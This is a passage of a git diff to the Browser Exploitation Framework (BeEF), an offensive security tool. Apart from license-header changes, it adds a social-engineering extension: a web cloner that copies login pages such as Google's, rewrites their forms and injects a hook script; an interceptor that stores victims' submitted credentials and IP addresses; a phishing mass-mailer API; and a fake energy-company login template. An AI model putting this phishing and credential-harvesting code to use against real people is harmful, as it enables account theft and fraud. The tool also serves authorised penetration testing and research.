";domain=" + domain : "" ) + - ( ( secure ) ? ";secure" : "" ); - }, - - getCookie: function(name) - { - var a_all_cookies = document.cookie.split( ';' ); - var a_temp_cookie = ''; - var cookie_name = ''; - var cookie_value = ''; - var b_cookie_found = false; - - for ( i = 0; i < a_all_cookies.length; i++ ) - { - a_temp_cookie = a_all_cookies[i].split( '=' ); - cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); - if ( cookie_name == name ) - { - b_cookie_found = true; - if ( a_temp_cookie.length > 1 ) - { - cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); - } - return cookie_value; - break; - } - a_temp_cookie = null; - cookie_name = ''; - } - if ( !b_cookie_found ) - { - return null; - } - }, - - deleteCookie: function (name, path, domain) - { - if ( this.getCookie(name) ) document.cookie = name + "=" + - ( ( path ) ? ";path=" + path : "") + - ( ( domain ) ? ";domain=" + domain : "" ) + - ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; - }, - - hasSessionCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', '', '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - }, - - hasPersistentCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', 1, '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - } - -}; - +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.browser.cookie + * + * Provides fuctions for working with cookies. + * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php + * Original author unknown. + * + */ +beef.browser.cookie = { + + setCookie: function (name, value, expires, path, domain, secure) + { + + var today = new Date(); + today.setTime( today.getTime() ); + + if ( expires ) + { + expires = expires * 1000 * 60 * 60 * 24; + } + var expires_date = new Date( today.getTime() + (expires) ); + + document.cookie = name + "=" +escape( value ) + + ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + + ( ( path ) ? ";path=" + path : "" ) + + ( ( domain ) ? ";domain=" + domain : "" ) + + ( ( secure ) ? ";secure" : "" ); + }, + + getCookie: function(name) + { + var a_all_cookies = document.cookie.split( ';' ); + var a_temp_cookie = ''; + var cookie_name = ''; + var cookie_value = ''; + var b_cookie_found = false; + + for ( i = 0; i < a_all_cookies.length; i++ ) + { + a_temp_cookie = a_all_cookies[i].split( '=' ); + cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); + if ( cookie_name == name ) + { + b_cookie_found = true; + if ( a_temp_cookie.length > 1 ) + { + cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); + } + return cookie_value; + break; + } + a_temp_cookie = null; + cookie_name = ''; + } + if ( !b_cookie_found ) + { + return null; + } + }, + + deleteCookie: function (name, path, domain) + { + if ( this.getCookie(name) ) document.cookie = name + "=" + + ( ( path ) ? ";path=" + path : "") + + ( ( domain ) ? ";domain=" + domain : "" ) + + ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; + }, + + hasSessionCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', '', '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + }, + + hasPersistentCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', 1, '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + } + +}; + beef.regCmp('beef.browser.cookie'); \ No newline at end of file diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js index bdea5eb35..640386d97 100644 --- a/core/main/client/browser/popup.js +++ b/core/main/client/browser/popup.js @@ -1,39 +1,30 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.browser.popup - * - * Provides fuctions for working with cookies. - * Several functions adopted from http://davidwalsh.name/popup-block-javascript - * Original author unknown. - * - */ -beef.browser.popup = { - - blocker_enbabled: function () - { - screenParams = beef.browser.getScreenSize(); - var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); - if (popUp == null || typeof(popUp)=='undefined') { - return true; - } else { - popUp.close(); - return false; - } - } -}; - +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.browser.popup + * + * Provides fuctions for working with cookies. + * Several functions adopted from http://davidwalsh.name/popup-block-javascript + * Original author unknown. + * + */ +beef.browser.popup = { + + blocker_enabled: function () + { + screenParams = beef.browser.getScreenSize(); + var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); + if (popUp == null || typeof(popUp)=='undefined') { + return true; + } else { + popUp.close(); + return false; + } + } +}; + beef.regCmp('beef.browser.popup'); diff --git a/core/main/client/dom.js b/core/main/client/dom.js index 387b514bf..c184fae17 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.dom * @@ -85,6 +76,30 @@ beef.dom = { return iframe; }, + + /** + * Returns the highest current z-index + * @param: {Boolean} whether to return an associative array with the height AND the ID of the element + * @return: {Integer} Highest z-index in the DOM + * OR + * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING} + */ + getHighestZindex: function(include_id) { + var highest = {'height':0, 'elem':''}; + $j('*').each(function() { + var current_high = parseInt($j(this).css("zIndex"),10); + if (current_high > highest.height) { + highest.height = current_high; + highest.elem = $j(this).attr('id'); + } + }); + + if (include_id) { + return highest; + } else { + return highest.height; + } + }, /** * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted. @@ -104,8 +119,15 @@ beef.dom = { var form_action = params['src']; params['src'] = ''; } - if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); } - if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); } + if (type == 'hidden') { + css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); + } else if (type == 'fullscreen') { + css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles); + $j('body').css({'padding':'0px', 'margin':'0px'}); + } else { + css = styles; + $j('body').css({'padding':'0px', 'margin':'0px'}); + } var iframe = $j(' + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + MyAccount + + + + + + + + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + +
+
+ + +
    +

    +
    + +
    +
+ +
+
+ +
+
+ + + + + + +
+

+ main content +

+
+ +
+ +
+
+
+

Login to MyAccount

+ + + +
+ + + + + + + + + +
+ + + + + + + + + + + + + + +
+ + + + helpPlease enter your username +
+ + + + helpPlease enter the password for this account +
+ + + + + +


+

Forgotten your username or password?

+
+ + +
+
+

Register Today!

+

 

+ +
    +
  • View and pay your bills
    • +
  • Submit your meter reading
    • +
  • Update your details
    • +
  • Sign up for Direct Debit
    • +

+ + + + + +
+ + +    +
+
+

Don't have an online account?
You can still submit a meter reading

+
+
+
+
+
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+ + + + +
+ + + \ No newline at end of file diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png new file mode 100644 index 000000000..2734ec427 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png differ diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png new file mode 100644 index 000000000..51ca21042 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png differ diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png new file mode 100644 index 000000000..a4f175112 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png differ diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb new file mode 100644 index 000000000..a5e4c0cc4 --- /dev/null +++ b/extensions/social_engineering/models/interceptor.rb @@ -0,0 +1,25 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + class Interceptor + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_interceptor' + + property :id, Serial + property :ip, Text, :lazy => false + property :post_data, Text, :lazy => false + + belongs_to :webcloner + + end + + end + end +end diff --git a/extensions/social_engineering/models/mass_mailer.rb b/extensions/social_engineering/models/mass_mailer.rb new file mode 100644 index 000000000..f29abe168 --- /dev/null +++ b/extensions/social_engineering/models/mass_mailer.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + + class Massmailer + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_massmailer' + + property :id, Serial + + #todo fields + end + + end + end +end diff --git a/extensions/social_engineering/models/web_cloner.rb b/extensions/social_engineering/models/web_cloner.rb new file mode 100644 index 000000000..1cbad0926 --- /dev/null +++ b/extensions/social_engineering/models/web_cloner.rb @@ -0,0 +1,26 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + class Webcloner + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_webcloner' + + property :id, Serial + + property :uri, Text, :lazy => false + property :mount, Text, :lazy => false + + has n, :extension_seng_interceptor, 'Interceptor' + + end + + end + end +end diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb new file mode 100644 index 000000000..d424644f0 --- /dev/null +++ b/extensions/social_engineering/rest/socialengineering.rb @@ -0,0 +1,128 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +module BeEF + module Extension + module SocialEngineering + class SEngRest < BeEF::Core::Router::Router + + config = BeEF::Core::Configuration.instance + + before do + error 401 unless params[:token] == config.get('beef.api_token') + halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip) + headers 'Content-Type' => 'application/json; charset=UTF-8', + 'Pragma' => 'no-cache', + 'Cache-Control' => 'no-cache', + 'Expires' => '0' + end + + #Example: curl -H "Content-Type: application/json; charset=UTF-8" + #-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue= + #https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2", "mount":"/url"}' + #-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7 + post '/clone_page' do + request.body.rewind + begin + body = JSON.parse request.body.read + uri = body["url"] + mount = body["mount"] + use_existing = body["use_existing"] + + if uri != nil && mount != nil + if (uri =~ URI::regexp).nil? #invalid URI + print_error "Invalid URI" + halt 401 + end + + if !mount[/^\//] # mount needs to start with / + print_error "Invalid mount (need to be a relative path, and start with / )" + halt 401 + end + + web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance + success = web_cloner.clone_page(uri,mount,use_existing) + if success + result = { + "success" => true, + "mount" => mount + }.to_json + else + result = { + "success" => false + }.to_json + end + end + + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/seng/clone_page" + error 400 # Bad Request + end + end + + # Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body' + #-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7 + # Example json_body: + #{ + # "template": "default", + # "subject": "Hi from BeEF", + # "fromname": "BeEF", + # "fromaddr": "beef@beef.com", + # "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx", + # "linktext": "http://beefproject.com", + # "recipients": [{ + # "user1@gmail.com": "Michele", + # "user2@antisnatchor.com": "Antisnatchor" + #}] + #} + post '/send_mails' do + request.body.rewind + begin + body = JSON.parse request.body.read + + template = body["template"] + subject = body["subject"] + fromname = body["fromname"] + fromaddr = body["fromaddr"] + link = body["link"] + linktext = body["linktext"] + + if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil? + print_error "All parameters are mandatory." + halt 401 + end + + if (link =~ URI::regexp).nil?#invalid URI + print_error "Invalid link or linktext" + halt 401 + end + + recipients = body["recipients"][0] + + recipients.each do |email,name| + if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil? + print_error "Email [#{email}] or name [#{name}] are not valid/null." + halt 401 + end + end + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/seng/send_emails" + error 400 + end + + begin + mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance + mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients) + rescue Exception => e + print_error "Invalid mailer configuration" + error 400 + end + end + + end + end + end +end \ No newline at end of file diff --git a/extensions/social_engineering/web_cloner/cloned_pages/readme.txt b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt new file mode 100644 index 000000000..ba99c53af --- /dev/null +++ b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt @@ -0,0 +1,12 @@ +This is the directory where the cloned pages will be placed. +If you clone beefproject.com, there will be 2 files: + - beefproject.com <- original, unmodified + - beefproject.com_mod <- modified one + +In case you want to further modify the beefproject.com_mod manually, +and serve it through BeEF, do the following: + - clone the page + - modify the beefproject.com_mod file + - clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call. + +In this way the x_mod page will be served, with your custom modifications. \ No newline at end of file diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb new file mode 100644 index 000000000..eca90da93 --- /dev/null +++ b/extensions/social_engineering/web_cloner/interceptor.rb @@ -0,0 +1,51 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Extension + module SocialEngineering + require 'sinatra/base' + class Interceptor < Sinatra::Base + + configure do + set :show_exceptions, false + end + + # intercept GET + get "/" do + print_info "GET request from IP #{request.ip}" + print_info "Referer: #{request.referer}" + cloned_page = settings.cloned_page + cloned_page + end + + # intercept POST + post "/" do + print_info "POST request from IP #{request.ip}" + request.body.rewind + data = request.body.read + print_info "Intercepted data:" + print_info data + + interceptor_db = BeEF::Core::Models::Interceptor.new( + :webcloner_id => settings.db_entry.id, + :post_data => data, + :ip => request.ip + ) + interceptor_db.save + + if settings.frameable + print_info "Page can be framed :-) Loading original URL into iFrame..." + "\n" + else + print_info "Page can not be framed :-) Redirecting to original URL..." + redirect settings.redirect_to + end + end + end + end + end +end + diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb new file mode 100644 index 000000000..9b98e3537 --- /dev/null +++ b/extensions/social_engineering/web_cloner/web_cloner.rb @@ -0,0 +1,186 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Extension + module SocialEngineering + class WebCloner + include Singleton + + + def initialize + @http_server = BeEF::Core::Server.instance + @config = BeEF::Core::Configuration.instance + @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/" + @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}" + end + + def clone_page(url, mount, use_existing) + print_info "Cloning page at URL #{url}" + uri = URI(url) + output = uri.host + output_mod = "#{output}_mod" + user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent') + + success = false + + # Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser, + # there is no need to implement the complex logic to handle all different cases. + # We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification. + # So ideally, if the the page needs custom modifications, the web_cloner usage will be the following: + # 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file + # - the user modify the example.com_mod file manually + # 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file + # + if use_existing.nil? || use_existing == false + begin #,"--background" + IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end + success = true + rescue Exception => e + print_error "Errors executing wget: #{e}" + print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH." + end + + if success + File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file| + File.open("#{@cloned_pages_dir + output}", 'r').each do |line| + # Modify the
line changing the action URI to / in order to be properly intercepted by BeEF + if line.include?("") || line.include?("")) && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') + out_file.print add_beef_hook(line) + print_info "BeEF hook added :-D" + else + out_file.print line + end + end + end + end + end + + if File.size("#{@cloned_pages_dir + output}") > 0 + print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" + + file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve + + # if the user wants to clone http://a.com/login.jsp?cas=true&ciccio=false , split the URL mounting only the path. + # then the phishing link can be used anyway with all the proper parameters to looks legit. + if mount.include?("?") + mount = mount.split("?").first + print_info "Normalizing mount point. You can still use params for the phishing link." + end + + # Check if the original URL can be framed + frameable = is_frameable(url) + + interceptor = BeEF::Extension::SocialEngineering::Interceptor + interceptor.set :redirect_to, url + interceptor.set :frameable, frameable + interceptor.set :beef_hook, @beef_hook + interceptor.set :cloned_page, get_page_content(file_path) + interceptor.set :db_entry, persist_page(url,mount) + + @http_server.mount("#{mount}", interceptor.new) + print_info "Mounting cloned page on URL [#{mount}]" + @http_server.remap + success = true + else + print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'." + success = false + end + + success + end + + private + # Replace with + def add_beef_hook(line) + if line.include?("") + line.gsub!("","\n") + elsif + line.gsub!("","\n") + end + line + end + + private + # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm + def is_frameable(url) + result = true + begin + uri = URI(url) + http = Net::HTTP.new(uri.host, uri.port) + if uri.scheme == "https" + http.use_ssl = true + http.verify_mode = OpenSSL::SSL::VERIFY_NONE + end + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + frame_opt = response["X-Frame-Options"] + + if frame_opt != nil + if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0 + result = false + end + end + print_info "Page can be framed: [#{result}]" + rescue Exception => e + result = false + print_error "Unable to determine if page can be framed. Page can be framed: [#{result}]" + print_debug e + #print_debug e.backtrace + end + result + end + + def get_page_content(file_path) + file = File.open(file_path,'r') + cloned_page = file.read + file.close + cloned_page + end + + def persist_page(uri, mount) + webcloner_db = BeEF::Core::Models::Webcloner.new( + :uri => uri, + :mount => mount + ) + webcloner_db.save + webcloner_db + end + + end + end + end +end + diff --git a/extensions/xssrays/api.rb b/extensions/xssrays/api.rb index ee98ed8e0..7a7ebbcd8 100644 --- a/extensions/xssrays/api.rb +++ b/extensions/xssrays/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb index ce5d31548..7d7e54e30 100644 --- a/extensions/xssrays/api/scan.rb +++ b/extensions/xssrays/api/scan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -53,19 +43,9 @@ module BeEF # todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session) content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('// - // Copyright 2012 Wade Alcorn wade@bindshell.net - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. + // Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + // Browser Exploitation Framework (BeEF) - http://beefproject.com + // See the file \'doc/COPYING\' for copying permission //', "") add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug ws.send(content + @body,hb.session) diff --git a/extensions/xssrays/config.yaml b/extensions/xssrays/config.yaml index 84d136b5a..7fd63a847 100644 --- a/extensions/xssrays/config.yaml +++ b/extensions/xssrays/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/admin_ui/controllers/xssrays/xssrays.rb b/extensions/xssrays/controllers/xssrays.rb similarity index 87% rename from extensions/admin_ui/controllers/xssrays/xssrays.rb rename to extensions/xssrays/controllers/xssrays.rb index c951f62e5..a3805b0f6 100644 --- a/extensions/admin_ui/controllers/xssrays/xssrays.rb +++ b/extensions/xssrays/controllers/xssrays.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/extension.rb b/extensions/xssrays/extension.rb index 4c024aed9..a9ea9327d 100644 --- a/extensions/xssrays/extension.rb +++ b/extensions/xssrays/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb index 500e7965e..dee21397b 100644 --- a/extensions/xssrays/handler.rb +++ b/extensions/xssrays/handler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/models/xssraysdetail.rb b/extensions/xssrays/models/xssraysdetail.rb index 8201e7b91..8b312005e 100644 --- a/extensions/xssrays/models/xssraysdetail.rb +++ b/extensions/xssrays/models/xssraysdetail.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/extensions/xssrays/models/xssraysscan.rb b/extensions/xssrays/models/xssraysscan.rb index 544cb251b..24ded2b93 100644 --- a/extensions/xssrays/models/xssraysscan.rb +++ b/extensions/xssrays/models/xssraysscan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/install b/install index 62bf0534e..ef2831b90 100755 --- a/install +++ b/install @@ -1,19 +1,9 @@ #!/usr/bin/env ruby # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 